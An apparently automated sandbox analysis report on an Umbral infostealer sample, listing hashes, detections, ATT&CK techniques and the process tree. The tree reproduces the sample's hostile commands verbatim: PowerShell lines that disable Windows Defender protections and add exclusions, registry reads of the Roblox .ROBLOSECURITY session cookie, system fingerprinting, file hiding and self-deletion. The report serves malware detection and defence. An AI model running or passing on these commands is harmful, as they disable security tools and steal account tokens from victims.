Analysis
-
max time kernel
22s -
max time network
25s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
16-11-2024 03:18
Behavioral task
behavioral1
Sample
b5uEJHZB6Rl.exe
Resource
win7-20241010-en
General
-
Target
b5uEJHZB6Rl.exe
-
Size
231KB
-
MD5
438289fb9c72ed39bf5497f9af21ec7a
-
SHA1
8120391ecb41ed6a4c6ef0b259776e59311d6997
-
SHA256
ea4cb7c7b4cfb2fcc04d1c3f96b20c26638e69a97b15cae14659f0d6afb78f85
-
SHA512
3647907fa2d503a242ef07cb20b081444b75e0c618a91232c8e77903b4b6aa823b8a7cbe07a45e02591fe48fdd23b5eae88565006b85863c0a5f6e42d7589fe0
-
SSDEEP
6144:YloZM+rIkd8g+EtXHkv/iD4Bs4DdLocD/abtIEx6tb8e1mTiu:GoZtL+EP8Bs4DdLocD/abtIExq1
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3004-1-0x0000000000A40000-0x0000000000A80000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2984 powershell.exe 2768 powershell.exe 1300 powershell.exe 1788 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
b5uEJHZB6Rl.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts b5uEJHZB6Rl.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1536 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 1536 cmd.exe 900 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
b5uEJHZB6Rl.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3004 b5uEJHZB6Rl.exe 2984 powershell.exe 2768 powershell.exe 1300 powershell.exe 2828 powershell.exe 1788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
b5uEJHZB6Rl.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 3004 b5uEJHZB6Rl.exe Token: SeIncreaseQuotaPrivilege 2960 wmic.exe Token: SeSecurityPrivilege 2960 wmic.exe Token: SeTakeOwnershipPrivilege 2960 wmic.exe Token: SeLoadDriverPrivilege 2960 wmic.exe Token: SeSystemProfilePrivilege 2960 wmic.exe Token: SeSystemtimePrivilege 2960 wmic.exe Token: SeProfSingleProcessPrivilege 2960 wmic.exe Token: SeIncBasePriorityPrivilege 2960 wmic.exe Token: SeCreatePagefilePrivilege 2960 wmic.exe Token: SeBackupPrivilege 2960 wmic.exe Token: SeRestorePrivilege 2960 wmic.exe Token: SeShutdownPrivilege 2960 wmic.exe Token: SeDebugPrivilege 2960 wmic.exe Token: SeSystemEnvironmentPrivilege 2960 wmic.exe Token: SeRemoteShutdownPrivilege 2960 wmic.exe Token: SeUndockPrivilege 2960 wmic.exe Token: SeManageVolumePrivilege 2960 wmic.exe Token: 33 2960 wmic.exe Token: 34 2960 wmic.exe Token: 35 2960 wmic.exe Token: SeIncreaseQuotaPrivilege 2960 wmic.exe Token: SeSecurityPrivilege 2960 wmic.exe Token: SeTakeOwnershipPrivilege 2960 wmic.exe Token: SeLoadDriverPrivilege 2960 wmic.exe Token: SeSystemProfilePrivilege 2960 wmic.exe Token: SeSystemtimePrivilege 2960 wmic.exe Token: SeProfSingleProcessPrivilege 2960 wmic.exe Token: SeIncBasePriorityPrivilege 2960 wmic.exe Token: SeCreatePagefilePrivilege 2960 wmic.exe Token: SeBackupPrivilege 2960 wmic.exe Token: SeRestorePrivilege 2960 wmic.exe Token: SeShutdownPrivilege 2960 wmic.exe Token: SeDebugPrivilege 2960 wmic.exe Token: SeSystemEnvironmentPrivilege 2960 wmic.exe Token: SeRemoteShutdownPrivilege 2960 wmic.exe Token: SeUndockPrivilege 2960 wmic.exe Token: SeManageVolumePrivilege 2960 wmic.exe Token: 33 2960 wmic.exe Token: 34 2960 wmic.exe Token: 35 2960 wmic.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeIncreaseQuotaPrivilege 2308 wmic.exe Token: SeSecurityPrivilege 2308 wmic.exe Token: SeTakeOwnershipPrivilege 2308 wmic.exe Token: SeLoadDriverPrivilege 2308 wmic.exe Token: SeSystemProfilePrivilege 2308 wmic.exe Token: SeSystemtimePrivilege 2308 wmic.exe Token: SeProfSingleProcessPrivilege 2308 wmic.exe Token: SeIncBasePriorityPrivilege 2308 wmic.exe Token: SeCreatePagefilePrivilege 2308 wmic.exe Token: SeBackupPrivilege 2308 wmic.exe Token: SeRestorePrivilege 2308 wmic.exe Token: SeShutdownPrivilege 2308 wmic.exe Token: SeDebugPrivilege 2308 wmic.exe Token: SeSystemEnvironmentPrivilege 2308 wmic.exe Token: SeRemoteShutdownPrivilege 2308 wmic.exe Token: SeUndockPrivilege 2308 wmic.exe Token: SeManageVolumePrivilege 2308 wmic.exe Token: 33 2308 wmic.exe Token: 34 2308 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
b5uEJHZB6Rl.execmd.exedescription pid process target process PID 3004 wrote to memory of 2960 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2960 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2960 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2508 3004 b5uEJHZB6Rl.exe attrib.exe PID 3004 wrote to memory of 2508 3004 b5uEJHZB6Rl.exe attrib.exe PID 3004 wrote to memory of 2508 3004 b5uEJHZB6Rl.exe attrib.exe PID 3004 wrote to memory of 2984 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2984 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2984 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2768 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2768 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2768 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 1300 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 1300 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 1300 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2828 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2828 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2828 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2308 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2308 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2308 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2400 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2400 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2400 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 632 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 632 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 632 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 1788 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 1788 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 1788 3004 b5uEJHZB6Rl.exe powershell.exe PID 3004 wrote to memory of 2644 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2644 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 2644 3004 b5uEJHZB6Rl.exe wmic.exe PID 3004 wrote to memory of 1536 3004 b5uEJHZB6Rl.exe cmd.exe PID 3004 wrote to memory of 1536 3004 b5uEJHZB6Rl.exe cmd.exe PID 3004 wrote to memory of 1536 3004 b5uEJHZB6Rl.exe cmd.exe PID 1536 wrote to memory of 900 1536 cmd.exe PING.EXE PID 1536 wrote to memory of 900 1536 cmd.exe PING.EXE PID 1536 wrote to memory of 900 1536 cmd.exe PING.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\b5uEJHZB6Rl.exe"C:\Users\Admin\AppData\Local\Temp\b5uEJHZB6Rl.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\b5uEJHZB6Rl.exe"2⤵
- Views/modifies file attributes
PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\b5uEJHZB6Rl.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2400
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1788
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2644
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\b5uEJHZB6Rl.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:900
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f8f8a139a20fa652906437032fcb21f9
SHA1121ee2d186d4462306539661cd9de008a095b717
SHA256a67571bdca17e8cd7547978be01114b281833b86c5b80c759e5a83f0a5ff3cf5
SHA512aa7d0c8d6a66df39524e906cda85ba1c817dd50fce53433090f3681a5997b367be40d41a1ccdf0c63572a054dbcfe7501251ff9e963fb41dead37bd17048cc3c